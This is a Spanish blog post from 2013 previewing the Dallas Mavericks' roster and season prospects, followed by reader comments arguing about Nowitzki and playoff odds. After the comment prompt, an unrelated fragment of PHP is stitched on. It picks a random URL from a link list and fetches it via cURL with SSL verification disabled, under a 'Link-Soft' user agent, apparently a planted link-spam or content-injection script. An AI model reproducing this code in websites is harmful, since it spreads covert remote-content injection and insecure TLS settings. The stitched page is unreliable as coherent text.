Dallas Mavericks: Factoría de fe

01 de October de 2013 por Love Denise

“All my life I was swinging for the fence, I was looking for the triple never playing good defense…….Piece of work I was really quite a jerk, keeping score is such a bore, a busy mind could go berserk…….Be my wife (Dirk) I think you’re right that we should mate”

Estos versos pertenecen a la canción “Factory of Faith” de Red Hot Chili Peppers y no sé por qué cada vez que la oigo me recuerda a Mark Cuban y a sus Mavs.

A principios del 2000, el polifacético Mark Cuban compraba los Mavericks y empezaba su particular factoría de fe, su sueño: convertir a un equipo hasta entonces relativamente modesto como los Mavs en una gran franquicia.

De la mano de su inseparable compañero y jugador franquicia, Dirk Nowitzki, el bueno de Cuban se gastaba millones de dólares cada año en formar equipos competitivos. Después de muchos fracasos y decepciones, cuando casi todos pensábamos que el sueño de Dallas de conseguir un anillo bajo un equipo liderado por el alemán se esfumaba, Cuban mantuvo su fe y en 2011, llegó el tan ansiado momento, el clímax, un anillo ganado a los flamantes Beach Boys de Miami  cobrándose la revancha del anillo perdido en 2006 ante los Heat. En ese momento, Cuban era el hombre más feliz del mundo, la vida le sonría, el canto de los pájaros era una dulce melodía para sus oídos y la barba enmarañada de Nowitzki le parecía más sexy que cualquier mujer que se le cruzase por el camino. Teniendo en cuenta que la ambición de ganar  y la billetera de Cuban no tienen fin, muchos pensábamos que los Mavs seguirían siendo contenders al anillo por mucho tiempo pero el descenso de rendimiento fruto de la edad de sus jugadores claves (Nowitzki, Terry, Kidd, Marion), algunas malas decisiones (traspaso de Chandler), y refuerzos que se convirtieron en estorbos (Odom, OJ Mayo, Delonte West, Elton Brand) hicieron que los Mavs se convirtiesen en un equipo mediocre, plano y vulgar. Desde que consiguieran el anillo hace 2 temporadas no han tenido la más mínima ocasión de codearse con los grandes. 

Durante este verano, los Mavs han tenido espacio salarial suficiente como para fichar dos grandes agentes libres. La fábrica de fe de Cuban seguía funcionando a plano rendimiento y los texanos se lanzaron a por los fichajes de Chris Paul y Dwight Howard. Por el pívot, incluso llegaron a grabar un vídeo de 3 horas intentando convencerle para que fichase por Dallas, pero ambos le dieron calabazas. Cuban, desesperado y dolido, intentó recomponer la plantilla apostando por dos  jugadores de cristal como Andrew Bynum y Greg Oden pero incluso este par de cojos le rechazó.

Los días pasaban y en su mansión Cuban lloraba a diario desconsoladamente sobre el pecho de alguna bella desconocida. No había tiempo, no quedaban buenos agentes libres, no sabía a quien fichar. Teniendo en cuenta este contexto y lo duro que se estaba poniendo el Oeste con la subida de nivel de equipos como Warriors, Pelicans o Rockets,  lo más sensato hubiera sido dar carpetazo a la “Era Dirk” traspasando al alemán, el cual se encuentra en su último año de contrato, y reconstruir el equipo con jugadores jóvenes. Pero Cuban nunca pierde la fe y jamás se da por vencido. Fue entonces cuando decidió sacar la chequera, tirando la casa por la ventana en fichajes y renovaciones como los de Jose Calderon, demasiado caro a mi parecer (29 millones de dólares en los próximos cuatro años), Samuel Dalembert (7 millones en 2 años), Brandan Wright (10 millones en los próximos 2 años) y el más interesante de todos, Monta Ellis por 25 millones durante las próximas tres temporadas.

Junto con unas cuantas elecciones de Draft y otros fichajes por el mínimo que a continuación analizaremos, Rick Carlisle tendrá a su disposición  una plantilla que no es mala pero sí bastante descompensada, con muchas carencias defensivas, poco poderosa físicamente y con una batería de jugadores muy distintos entre sí cuya mezcla puede ser un desastre.

Bases: El point-guard titular será José Calderón. A sus 32 años, el extremeño es un sólido base en ataque, poco espectacular pero eficiente y con un gran ratio asistencias/perdidas. Su hándicap lo encontramos en la defensa, donde junto a Monta Ellis pueden formar el peor back-court defensivo de la liga. Habrá que prestar atención a si es capaz de manejar a los Mavs bajo su ritmo calmado y e inteligente o si por el contrario, se verá envuelto en la vorágine alocada, eléctrica y vertiginosa de Ellis.

El segundo base será Devin Harris, que fue cortado y readmitido posteriormente. Ha firmado por el mínimo y desde hace un par de años está muy lejos de ser el jugador resolutivo que era. Para dar profundidad a la plantilla estarán los rookies Gal Mekel y Shane Larkin. El primero  viene de proclamarse MVP de la liga israelí, su país de origen. El segundo, fue seleccionado en el puesto 18 del último Draft y se trata de un base con un gran tiro exterior. Sus roles y la cantidad de minutos que jueguen se verán condicionados en función del rendimiento de Harris.

Escoltas: Monta Ellis será la referencia exterior  del equipo y el jugador que cargará con la responsabilidad de crear y anotar en momentos complicados. Que es un autentico jugón lo sabemos todos pero también a veces desaparece o presenta una selección de tiros realmente mala. No obstante, es un gran refuerzo para los Mavs y durante el año habrá una decena de partidos que prácticamente ganará el solo.

Para darle minutos de descanso, se encuentra el veterano Vince Carter, el cual hizo una muy buena campaña el año pasado como sexto hombre, yéndose a 13 puntos por partido en poco más de 25 minutos. Wayne Ellington y el rookie Ricky Ledo (pick 43, Draft 2013) se disputarán los minutos de SG que puedan sobrar durante el año.

Aleros: Shawn Marion será el alero titular del equipo. Matrix aún sigue cumpliendo tanto en ataque como en defensa (12 puntos, 8 rebotes el curso pasado) pero los años no pasan en balde y, naturalmente, su capacidad cada año es menor para defender a aleros más fuertes y una decena de años más jóvenes que él. Por eso, sería importante que su sustituto, Jae Crowder diese un paso adelante y acabara de consolidarse como un jugador sólido de rotación. En defensa su trabajo es intenso pero en ataque es un jugador bastante limitado. No obstante, su margen de mejora aún es amplio.

Por último, los Mavs recientemente han fichado por el mínimo a Devin Ebanks. Personalmente, siempre me ha parecido un jugador muy útil y aprovechable para cualquier franquicia pero tras pasarse un año en blanco sin jugar en Lakers, su rendimiento es toda una incógnita.

Ala-pívots: Dirk Nowitzki. Tras una última temporada lastrado por problemas físicos que le hicieron perderse 29 partidos y evitaron que pudiese jugar a su máximo nivel, el mejor jugador europeo de todos los tiempos volverá a ser otro año más el jugador franquicia y el corazón de este nuevo proyecto texano. Compromiso, capacidad de liderazgo, carácter, versatilidad y por supuesto calidad, mucha calidad la que ha mostrado el alemán durante sus 15 temporadas en Dallas. Como ya hemos dicho, el año que viene acaba contrato, por lo que podríamos estar ante su última campaña en la franquicia del caballo.

Para darle descanso, los Mavs tienen a Brandan Wright quien después de deambular muchos años por la liga consiguió firmar una decente campaña promediando 8 puntos y 4 rebotes en 18 minutos, lo que le ha servido para ganarse la renovación. Para completar el PF, los Mavs han fichado por el mínimo a DeJuan Blair. Gran fichaje a mi juicio, aunque su estado de forma es difícil de predecir tras calentar banquillo durante el último tramo de la temporada pasada. Y si Gregg Popovych no lo usó, suponemos que habría motivos deportivos justificados.

Pívots: Ni Brand ni Kaman funcionaron el año pasado. El aro de los Mavs fue durante todo el año un coladero y el equipo fue el 28º en rebotes. Los dos acabaron este verano fuera del equipo, aunque la cosa no pinta mucho mejor en Dallas. El center titular será Samuel Dalembert, que llega desde Milwaukee donde era el pívot suplente de Sanders. Los mejores años del haitiano ya pasaron a mejor vida y no creo que mejore mucho el rendimiento de sus predecesores, aunque el listón lo tiene realmente bajo.

Para completar la pintura, los Mavs cuentan con Bernard James, un antiguo militar estadounidense que empezó a jugar demasiado tarde a esto. Se trata de un pívot de baja estatura, rocoso defensivamente y con poca calidad técnica.  No creo que disponga de muchos minutos, y finalmente serán entre Wright y Blair los que acaben rellenando los minutos que deje Dalembert en el C.

Quinteto inical: José  Calderón – Monta Ellis – Shawn Marion – Dirk Nowitzki – Samuel Dalembert
Sexto hombre: Vince Carter

Pronóstico: 11º equipo del Oeste (37-45)

Comenta

15 comentarios a esta entrada

  1. Nacho dice:
    #1

    Uffff.
    ¿El mejor jugador europeo de todos los tiempos?
    ¿11º equipo del Oeste?
    No te compro ninguna de esas afirmaciones.
    Yo sí los veo peleando y aún entrando en PO, no olvidemos que junto al mejor jugador alemán de todos los tiempos, está el mejor base extremeño desde que se inventó el baloncesto.
    Cuidado con los viejos este año, que me da que van a dar más de una sorpresa. (Léase Lakers, Spurs, Mavericks y Nets)

      Citar

  2. Denise dice:
    #2

    Nacho:
    Uffff.
    ¿El mejor jugador europeo de todos los tiempos?
    ¿11º equipo del Oeste?
    No te compro ninguna de esas afirmaciones.
    Yo sí los veo peleando y aún entrando en PO, no olvidemos que junto al mejor jugador alemán de todos los tiempos, está el mejor base extremeño desde que se inventó el baloncesto.
    Cuidado con los viejos este año, que me da que van a dar más de una sorpresa. (Léase Lakers, Spurs, Mavericks y Nets)

    ¿ quien es para ti el mejor europeo de todos los tiempos? En la NBA, desde luego que el mejor es Dirk y de largo..
    Y los Playoffs los veo chungisimos para este equipo. Sólo veo a Phoenix, Utah y Sacramento claramente por debajo de ellos, en la horquilla del 8 al 12 meto a Wolves, Blazers, Nuggets, Lakers y Mavs.
    Los 7 equipos restantes (Thunder, Spurs, Rockets, Clippers, Grizzlies, Warriors, Pelicans) los veo muy superiores a ellos. En mi opinión, para que se metan en PO, tendran que esperar a lesiones importantes de los rivales, y que alguno de los rookies que en principio van a tener papeles marginales, den la sorpesa y exploten de manera considerable, porque lo que es el nucleo duro de la plantilla, son todos jugadores veteranos ya sin margenes de mejora, y todos sabemos el rendimiento que van a dar, y con eso no les llega para playoffs.
    Como digo en el articulo, tras no conseguir a Paul y DH, Cuban se equivoca en la dirección del proyecto y debería haber traspasado a Dirk por jovenzuelos y haber iniciado una profunda reconstrucción.

      Citar

  3. diestro dice:
    #3

    Veis por delante a Pelicans de equipos como Lakers, Mavs, Blazers o Nuggets??

    Voy a echar un vistazo, pero es que me da la impresión de que hay muchas expectativas y no creo que hayan empatado todavía con nadie.

    A estos Mavs les veo muy faltos de defensa, y lo van a pasar mal, pero como les de por enchufarlas, con los tiradores que tienen les hacen un traje a cualquiera.

      Citar

  4. HisRoyalAirness dice:
    #4

    El mejor europeo (NBA) de todos los tiempos sin duda. No vale sacar a colación a Sabas o Drazen porque Dirk se ha codeado con los mejores toda su vida.

    Por cierto hola, cuanto tiempo sin venir por estos lares chicos

      Citar

  5. Nacho dice:
    #5

    Aún ciñiéndonos exclusivamente a la trayectoria NBA, hay por ahí un tal Parker que no es manco.

      Citar

  6. Denise dice:
    #6

    Nacho:
    Aún ciñiéndonos exclusivamente a la trayectoria NBA, hay por ahí un tal Parker que no es manco.

    Pero Parker aun siendo muy bueno, es el escudero de Duncan, el que para muchos es el mejor 4 de la historia. Nowitzki lleva mas de una decada siendo el jugador franquicia de un equipo NBA, ha ganado un anillo como tal y ha llegado a otra final. Yo no tengo la mas minima duda de que es el mejor europeo de todos los tiempos, pero cada uno es libre de pensar lo que quiera, faltaria más 🙂

      Citar

  7. Denise dice:
    #7

    diestro:
    Veis por delante a Pelicans de equipos como Lakers, Mavs, Blazers o Nuggets??

    Voy a echar un vistazo, pero es que me da la impresión de que hay muchas expectativas y no creo que hayan empatado todavía con nadie.

    Sin lesiones de por medio, los Pelicans tienen un pedazo de perimetro con Holiday, Evans y Gordon, que no le tienen que envidiar a nadie. Y por dentro, confio mucho en la mejoría de Davis. Habrá que ver como se ha repuesto Anderson tras el suicidio de su novia, pero a priori, el quinteto es espectacular.
    Despues en el banco, hay gente muy interesante con margen de progresión aun como Aminu, Austin Rivers, ó Jason Smith, Yo les doy PO partiendo de que Gordon esté sano todo el año.

      Citar

  8. Esteban dice:
    #8

    se m e vino a la manete, que los mavs de alguna manera logran convencer a orlando que les mande a afflalo, por una primera ronda

    con aron afflalo de dos, las carencias defensivas de calderon quedarian mas disimuladas, y esto podría hacer a monta ellis salir de sexto hombre y ser una nueva version y mejorada de j.r. smith con 20 puntos poor partido saliendo del banco

    este pequeño cambio no los hace candidatos al titulo, pero al menos podrian pensar en llegar a una segunda ronda

      Citar

  9. rumbero dice:
    #9

    Denise:
    Yo les doy PO partiendo de que Gordon esté sano todo el año.

    Eso se debe pagar más caro que los Sixers se lleven el anillo no? 😀

    Coincido bastante con el análisis. A mi sin acabar de gustarme el equipo me convence un poco más que el año pasado, pero a la vez parece que el amigo Cuban se ha vuelto incapaz de convencer a las estrellas para que vayan a Dallas. Calde y Ellis tendrán que hacerlo mucho mejor que Collison y Mayo. Debería ser así pero sin haberlos visto me genera bastantes dudas su convivencia en pista. Y su defensa claro. Y en la pintura siguen sin encontrar al acompañante de Dirk porque los que han llegado son en teoría un poco mejor que lo que había pero no para tirar cohetes. La clave por eso seguiría siendo que Nowitzki ande bien como se vió el año pasado. Creo que van a tener que sudar mucho para los PO. A priori van a estar caras a las dos últimas plazas del oeste con mucho equipo con posibilidades y si no andan con un poco de suerte se van a quedar fuera

      Citar

  10. Esteban dice:
    #10

    no no olvidemos que guste o no kaman es vasrias veces meor jugador que dalembert,

    aunque cuban resucito a chandler en un momento, quiza pueda hacer lo mismo con samuel

      Citar

  11. HisRoyalAirness dice:
    #11

    Puf, va a estar MUUUY cruel meterse en playoffs este año en el Oeste, más incluso que ultimamente.
    Veo a los lobitos con muchas ganas y Kevin Love sano es, para mí, un top 5 de la liga. Eso junto a Pekovic, Rubio y Martin, yo les doy PO seguro.
    Los Pelicans tienen un equipo curioso pero no sé yo si les llegará.

    Pero es que es increíble, veo a todos los equipos con chances

      Citar

  12. Simon dice:
    #12

    Yo para PO sólo descartaría este año a Phoenix y a Utah… por lo demás veo muchas opciones para todos. Doy por casi seguros a Houston, Clippers, San Antonio, Golden State, Oklahoma y Memphis ( 6 equipos ), si todos están sanos incluiría a Minnesota y para la octava a Denver o Portland pero como apuesta personal pues para la octava plaza el abanico es casi infinito ( Lakers, Dallas, Pelicans e incluso Sacramento si todos se “centran” en un objetivo común )

      Citar

  13. txusma dice:
    #13

    Yo no veo a los Lakers entrando en Playoffs y no creo que deban forzar a Kobe para lograrlo.
    Pero esto es el análisis de los Mavs así que comento que lo tienen complicado. Dirk sigue siendo una garantía pero ese duo Calderon-Ellis es muy estraño. No por la defensa sinó pq representan dos estilos de juego antagónicos. Veremos cual de los 2 se lleva el gato al agua.

      Citar

  14. sempren dice:
    #14

    Por un momento pensé que el análisis lo había escrito Sancho xDDD
    Muy bueno Denise (como todos, por otra parte).

    Tienen buenos jugadores, pero. Con un Ellis algo centrado, entre él y Dirk casi podrían llevar a un equipo a Playoffs, pero ese casi no se ve apoyado por una plantilla potente: en la pintura no destacan, los aleros no son de primer nivel (Marion sigue rindiendo, a lo suyo, pero a mí cada vez me gusta menos), y tienen un par de buenos bases, pero que tampoco te sacan de pobres. Y tampoco la defensa es su fuerte…

    Es muy factible que den la sorpresa, pero a eso mismo voy: sería una sorpresa.

    PD: se me había borrado y ahora me quedó algo más pesimista que antes en cuanto al análisis de la plantilla, pero tampoco sé como matizarlo mejor xD

      Citar

  15. Tobal dice:
    #15

    Pueden entrar en playoffs,aunque el tema del juego interior lo veo algo flojo,Dalembert como bien dice el artículo,ya nos es el que era,aunque aportará algo seguro.El fichaje de Calderón ,sí lo veo interesante para Dallas,sabe anotar y marcará el ritmo de los partidos,además de que tiene un gran tiro exterior,yo como aficionado de los Mavericks,deseo que el equipo llegue lo más lejos posible,soy optimista.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>